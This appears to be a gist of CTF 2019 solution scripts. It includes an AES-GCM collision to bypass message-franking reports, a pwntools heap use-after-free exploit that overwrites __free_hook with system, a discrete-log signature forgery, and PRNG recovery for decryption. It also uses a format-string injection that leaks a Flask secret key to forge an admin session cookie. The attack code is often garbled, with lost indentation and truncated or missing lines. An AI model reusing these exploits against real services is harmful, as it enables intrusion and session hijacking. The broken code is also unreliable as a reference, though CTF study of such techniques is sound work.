Forked from niklasb/0_frank.sage
Created June 3, 2019
Facebook CTF 2019 solutions: frank, babylist, storagespace, netscream, keybaseish, events
Impl of AES-GCM collision, section 3.1,
Use this, then send two messages to the bot with the same message ID
(& ciphertext) but different keys. I didn't include the code, but it is as
easy as changing the encrypt_inner and send functions to use hardcoded
in and outputs.
We will send a benign version of the message first, and then the abusive version.
The bot will look up the message by message ID as follows for reporting (
(_, ts, ctxt, msg, fbtag) = [
x for x in self._all_messages[who] if x[0] == mid
We will have two messages with the same ID in this list, but the first one
is benign, so the report will be invalid and we get the flag.
Pseudocode encryption:
M = input message
kf, km = random keys
fbtag_key = server secret
# inner encryption with ephemeral key
cm = AES(key=km, M)
publish cm under message ID mid # <- this is the ciphertext that we reuse twice
# outer encryption (end-to-end)
M' = mid + km + H(cm)
com = HMAC(key=kf, M')
ctxt = RSA(M' + kf)
publish ctxt + com # <- this part we change between messages
# (specifically, we change km and compute
# a new commitment)
# server
fbtag = HMAC(key=fbtag_key, com + sender + receiver + time())
publish fbtag
import Crypto.Cipher.AES as AES
from Crypto.Util import Counter
from Crypto.Util.number import bytes_to_long, long_to_bytes
import random
import sys
import requests
import socket
import itertools
F = GF(2)
BF.<X> = F[]
FF.<A> = GF(2 ^ 128, modulus=X ^ 128 + X ^ 7 + X ^ 2 + X + 1)
# helpers
def str2bits(str):
res = []
for c in str:
res += map(int,bin(ord(c))[2:].zfill(8))
return res
def int2ele(integer):
res = 0
for i in range(128):
# rightmost bit is x127
res += (integer & 1) * (A ^ (127 - i))
integer >>= 1
return res
def ele2int(element):
integer = element.integer_representation()
res = 0
for i in range(128):
res = (res << 1) + (integer & 1)
integer >>= 1
return res
def str2ele(s):
assert len(s) == 16
return int2ele(bytes_to_long(s))
def ele2str(x):
return long_to_bytes(ele2int(x), 16)
# AES-GCM implementation
def compute_tag(H, K0, txt):
len_txt = len(txt)
data = txt
while len(data) % 16:
data += '\0'
tag = 0
assert len(data) % 16 == 0
for i in range(len(data) // 16):
tag += int2ele(bytes_to_long(data[i * 16: (i + 1) * 16]))
tag *= H
tag += int2ele(8 * len_txt)
tag *= H
tag += int2ele(bytes_to_long(K0))
return ele2int(tag)
def xor(a, b):
return ''.join(chr(ord(x)^^ord(y)) for x, y in zip(a,b))
def get_k0(key, iv):
iv = bytes_to_long(iv)
aes_ecb =, AES.MODE_ECB)
return aes_ecb.encrypt(long_to_bytes((iv << 32) | 1, 16))
def get_hash_key(key):
aes_ecb =, AES.MODE_ECB)
return int2ele(bytes_to_long(aes_ecb.encrypt('\0'*16)))
# sanity check
def encrypt2(key, iv, plaintext):
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
enc = Cipher(
ct = enc.update(plaintext)
ct += enc.finalize()
return ct, enc.tag
def encrypt(key, iv, plaintext):
ct2, tag2 = encrypt2(key, iv, plaintext)
assert len(key) == 16
aes_ecb =, AES.MODE_ECB)
H = get_hash_key(key)
assert len(iv) == 12
iv = bytes_to_long(iv)
len_plaintext = len(plaintext)
while len(plaintext)%16:
plaintext += '\0'
ctr = 2
ciphertext = ''
for i in range(len(plaintext)//16):
pt_block = plaintext[i*16:(i+1)*16]
ctr_block = aes_ecb.encrypt(long_to_bytes((iv << 32) | ctr, 16))
ctr += 1
ciphertext += xor(pt_block, ctr_block)
ciphertext = ciphertext[:len_plaintext]
K0 = get_k0(key, long_to_bytes(iv, 16))
auth_tag = compute_tag(H, K0, ciphertext)
assert auth_tag < (1 << 128)
assert ciphertext == ct2
assert int(tag2.encode('hex'), 16) == auth_tag
return ciphertext, auth_tag
class TagError(Exception):
def decrypt(key, iv, ciphertext, auth_tag):
assert len(key) == 16
aes_ecb =, AES.MODE_ECB)
H = get_hash_key(key)
assert len(iv) == 12
iv = bytes_to_long(iv)
len_ct = len(ciphertext)
while len(ciphertext)%16:
ciphertext += '\0'
ctr = 2
plaintext = ''
for i in range(len(ciphertext)//16):
ct_block = ciphertext[i*16:(i+1)*16]
ctr_block = aes_ecb.encrypt(long_to_bytes((iv << 32) | ctr, 16))
ctr += 1
plaintext += xor(ct_block, ctr_block)
ciphertext = ciphertext[:len_ct]
K0 = get_k0(key, long_to_bytes(iv, 16))
expected_auth_tag = compute_tag(H, K0, ciphertext)
if auth_tag != expected_auth_tag:
raise TagError
return plaintext
def collide_gcm(key1, key2, iv, ciphertext):
iv = bytes_to_long(iv)
aes1 =, AES.MODE_ECB)
aes2 =, AES.MODE_ECB)
H1 = get_hash_key(key1)
H2 = get_hash_key(key2)
P1 = str2ele(aes1.encrypt(long_to_bytes((iv << 32) | 1, 16)))
P2 = str2ele(aes2.encrypt(long_to_bytes((iv << 32) | 1, 16)))
assert len(ciphertext) % 16 == 0
mlen = len(ciphertext) // 16 + 1
lens = int2ele(8 * len(ciphertext) + 128)
acc = lens * (H1 + H2) + P1 + P2
for i in range(1, mlen):
Hi = H1^(mlen + 2 - i) + H2^(mlen + 2 - i)
Ci = str2ele(ciphertext[(i-1) * 16: i * 16])
acc = acc + Ci * Hi
inv = (H1^2 + H2^2)^(-1)
Cmlen = acc * inv
Ca = ciphertext + ele2str(Cmlen)
K0 = get_k0(key1, long_to_bytes(iv, 16))
tag = compute_tag(H1, K0, Ca)
return Ca, tag
iv = b'a'*12
key1 = b'b'*16
key2 = b'c'*16
plaintext = b'abuse'
plaintext += b'a'*(32-len(plaintext))
ct, tag = encrypt(key1, iv, plaintext)
assert plaintext == decrypt(key1, iv, ct, tag)
ct2, tag2 = collide_gcm(key1, key2, iv, ct)
pt1 = decrypt(key1, iv, ct2, tag2)
pt2 = decrypt(key2, iv, ct2, tag2)
tag2 = long_to_bytes(tag2)
assert len(tag2) == 16
print 'pt1 = b%r' % pt1
print 'pt2 = b%r' % pt2
print 'tag = b%r' % tag2
print 'ct = b%r' % ct2
print 'iv = b%r' % iv
Bug: The duplicate command memcpys one std::vector over another one,
which is... not recommended. After resizing the first one the second one points
to UAF memory. We can use this to leak and then overwrite a List object.
import struct
from pwn import *
def connect():
global r
# r = remote('localhost', 4444)
r = remote('', 1343)
r.recvuntil('> ')
def create(name):
r.recvuntil('> ')
def add(listidx, num, wait=True):
num = struct.unpack('<i', struct.pack('<I', num))[0]
if wait:
r.recvuntil('> ')
def view(listidx, i):
r.recvuntil(' = ')
res = r.recvuntil('\n').strip()
r.recvuntil('> ')
return int(res)
def duplicate(listidx, name):
r.recvuntil('> ')
def remove(listidx):
r.recvuntil('> ')
def more(listidx, num, wait=True):
for i in range(num):
print i
add(listidx, 0xbadbeef, wait=wait)
create('leak1') # 0
more(0, 3)
duplicate(0, 'leak1x') # 1
more(0, 2)
leak = view(1,0) + 2**32*view(1,1)
heap = leak - 0x55555576af20 + 0x0000555555759000
print 'heap @',hex(heap)
create('leak2') # 2
more(2, 512)
duplicate(2, 'leak2x') # 3
more(2, 1)
leak = view(3,0) + 2**32*view(3,1)
libc = leak - 0x7ffef7829ca0 + 0x00007ffff743e000
print 'libc @',hex(libc)
create('bar') # 4
add(4, struct.unpack('<i', 'sh\0\0')[0])
more(4, 16)
duplicate(4, 'baz') # 5
more(4, 16)
create('lul') # 6 -> victim
# Advance pointer of the UAF array until begin pointer of array 6
more(5, 11)
# Write-what-where by overwriting begin ptr
where = libc + 0x7ffff782b8e8 - 0x00007ffff743e000 # __free_hook
what = libc + 0x7ffff748d440 - 0x7ffff743e000 # system
# begin
add(5, 0)
add(5, 0)
# end
add(5, where % 2**32)
add(5, where // 2**32)
# end_capacity
where += 100
add(5, where % 2**32)
add(5, where // 2**32)
add(6, what % 2**32)
add(6, what // 2**32)
# trigger free('sh\0')
more(4, 32, wait=False)
Insight here was that the order of the generator is only 128 bit and
has small prime factors, thus we can use Pohlig-Hellman to solve dlog
and derive the key from the equation G*key = H.
import random
import base64
import json
import hashlib
from import * # from
from sage.all import EllipticCurve, GF, proof, factor
ru('> ')
print 'getting params'
sendln('{"command":"sign", "params":{"command":"info"}}')
cmd = readln()
ru('> ')
ru('x**3 + ')
a = int(ru('*')[:-1])
ru('+ ')
b = int(ru(' ')[:-1])
ru('mod ')
mod = int(ru(')')[:-1])
ru(': (')
gx = int(ru(', ')[:-2])
gy = int(ru(')')[:-1])
ru(': (')
hx = int(ru(', ')[:-2])
hy = int(ru(')')[:-1])
prev_proof_state = proof.arithmetic()
proof.arithmetic(False) # turn off primality checking
FF = GF(mod)
EC = EllipticCurve([FF(a), FF(b)])
G = EC(gx, gy)
H = EC(hx, hy)
n = G.order()
print 'computing dlog'
print 'order', n
print 'order factors', factor(n)
key = G.discrete_log(H)
print 'done', key
assert G*key == H
def sign(message, key):
# n: curve order
# G: generator
while True:
k = random.randint(1, n)
Q = G * k
hash_message = message + str(int(Q[0]))
mhash = hashlib.sha256(hash_message)
r = int(mhash.hexdigest(), 16)
if r % n == 0:
s = (k - (r * key)) % n
if s != 0:
return (r, s)
request = {
'command': 'flag',
'params': {
'name': 'fbctf'
text = json.dumps(request, sort_keys=True)
r, s = sign(text, key)
sig = base64.b64encode((str(r) + '|' + str(s)))
request['sig'] = sig
Key insight here was that the AES encryption was actually skipped due to use
of a shared global variable. Thus we directly get the PRNG output as the
IV in the "enc" file, which just has 2 bytes missing that we can brute force
to reconstruct the entire stream.
Pseudocode of binary logic:
return random 256-bit number
<initialize curve and point P>
r = rand()
new_key(): # PRNG implementation
xs = []
for i := 0 to 1: # run twice...
r = (G*r).x
return bottom 30 bytes of xs[0] + bottom 2 bytes of xs[1]
plain = read file argv[1]
ivec = new_key()
key = new_key()
cipher = aes_ige(plain, iv=ivec, key=key)
write key to file "key"
write ivec + cipher to file "enc"
from IPython import embed
# from with small fixed
from ige import ige_decrypt
p256 = 115792089210356248762697446949407573530086143415290314195533631308867097853951L
a256 = p256 - 3
b256 = 41058363725152142129326129780047268409114441015993725554835256314039467401291L
## base point values
gx = 48439561293906451759052585252797914202762949526041747995844080717082404635286L
gy = 36134250956749795798585127919587881956611106672985015071877198253568414405109L
## order of the curve
qq = 115792089210356248762697446949407573529996955224135760342422259061068512044369L
prev_proof_state = proof.arithmetic()
proof.arithmetic(False) # turn off primality checking
FF = GF(p256)
EC = EllipticCurve([FF(a256), FF(b256)])
_.<Y> = FF[]
def f(x):
return x^3 + a256*x + b256
def point(x):
x = FF(x)
poly = Y^2 - f(x)
return EC(x, poly.roots()[0][0])
# define the base point
G = EC(FF(gx), FF(gy))
x = 0xF6C4F766B3C61F09E609582224CC8EBCCF4CD4961EF780CC02E8F09A0EFA7CA5
y = 0xF212C5768D46716C6CAC4D23FF12E8AE89FD9EEEC83A0E83E35DB3AADE0CCB5B
d = 0x6FC45453894DE99C661581B0A12087B862667B785AABA7116DCDCB3CB3A79AFE
P = EC(FF(x), FF(y))
assert G == P*d
# assert (G*3)*2 == G*(3*2)
# assert (G*100)*200 == G*(100*200)
# exit()
enc = open('dist/enc', 'rb').read()
# actual_key = open('dist/test/key', 'rb').read()
actual_key = None
ivec = enc[:32]
cipher = enc[32:]
x1_lo = int(ivec[:30].encode('hex'),16)
x2_lo = int(ivec[30:].encode('hex'),16)
# L, R = 0, 2**16
L, R = 5245, 5246
def to_bytes(x, sz):
h = hex(int(x)).rstrip('L').lstrip('0x')
while len(h) < sz*2:
h = '0' + h
assert len(h) == sz*2
return h.decode('hex')
def check(X1):
res = [X1]
for i in range(10):
R = res[-1]*d
r = int(R[0])
X = P*r
res = [int(X[0]) for X in res]
stream = ''
i = 0
while i + 1 < len(res):
stream += to_bytes(res[i] & ((1<<240)-1), 30)
stream += to_bytes((res[i + 1] >> 224) & 0xffff, 2)
i += 2
assert stream[:32] == ivec
key = stream[32:64]
if actual_key != None:
assert stream[32:64] == actual_key
print ige_decrypt(cipher, key, ivec)
for i in xrange(L, R):
if i % 1000 == 0:
print i
x1 = x1_lo + (i << 240)
X1 = point(x1)
R2 = X1*d
r2 = int(R2[0])
X2 = P*r2
x2 = int(X2[0])
if ((x2 >> 224) & 0xffff) == x2_lo:
print 'YES', i
# Trick here was to use a small e and just chose the modulus based on the PIN
# assembled from
X = 43522081190908620239526125376626925272670879862906206214798620592212761409287968319160030205818706732092664958217053982767385296720310547463903001181881966554081621263332073144333148831108871059921677679366681345909190184917461295644569942753755984548017839561073991169528773602380297241266112083733072690367
pin = 672241
e = 4
Y = X**e
N = Y - pin
# trivially, Y % N == pin
print '{}:{}'.format(e, N)
#!/usr/bin/env python3
Step 1: get secret key this via format string injection:
I believe the server side has super weird code like:
event = Event(name='a', address='b') # sqlalchemy object
output += ('<li>{event.' + request.query['event_important'] + '}</li>').format(event=event)
We learned the hard way that itsdangerous behavior varies between Python 2 and 3
import requests
import base64
import hashlib
from itsdangerous import URLSafeTimedSerializer
from flask.sessions import TaggedJSONSerializer
# Just a random, valid session cookie
cookie = '.eJwlzj0OwjAMBtC7ZO7gOD-f3ctUdpwI1pZOiLuDxP6G907HOuf1SPvrvOeWjmekPXmjBQbIFohFYDMyqrOwc0En7TZyj7WKmsUQg2elusQURvEDYiyeSx5aa5-AiZKFuSvI2yDlrq2we5OgNWRYIGNMU4akLd3XPP-ZDKTPF8WzLyY.XPQOsQ.afA_iiPuSMB3xfj788GGmt7pgBI'
def sign(values):
salt = 'cookie-session'
serializer = TaggedJSONSerializer()
signer_kwargs = {
'key_derivation': 'hmac',
'digest_method': hashlib.sha1
s = URLSafeTimedSerializer(secret_key, salt=salt,
serializer=serializer, signer_kwargs=signer_kwargs)
return s.dumps(values)
user = sign('admin')
def check():
r = requests.get('', cookies={
'events_sesh_cookie': cookie,
'user': user,
return r.text
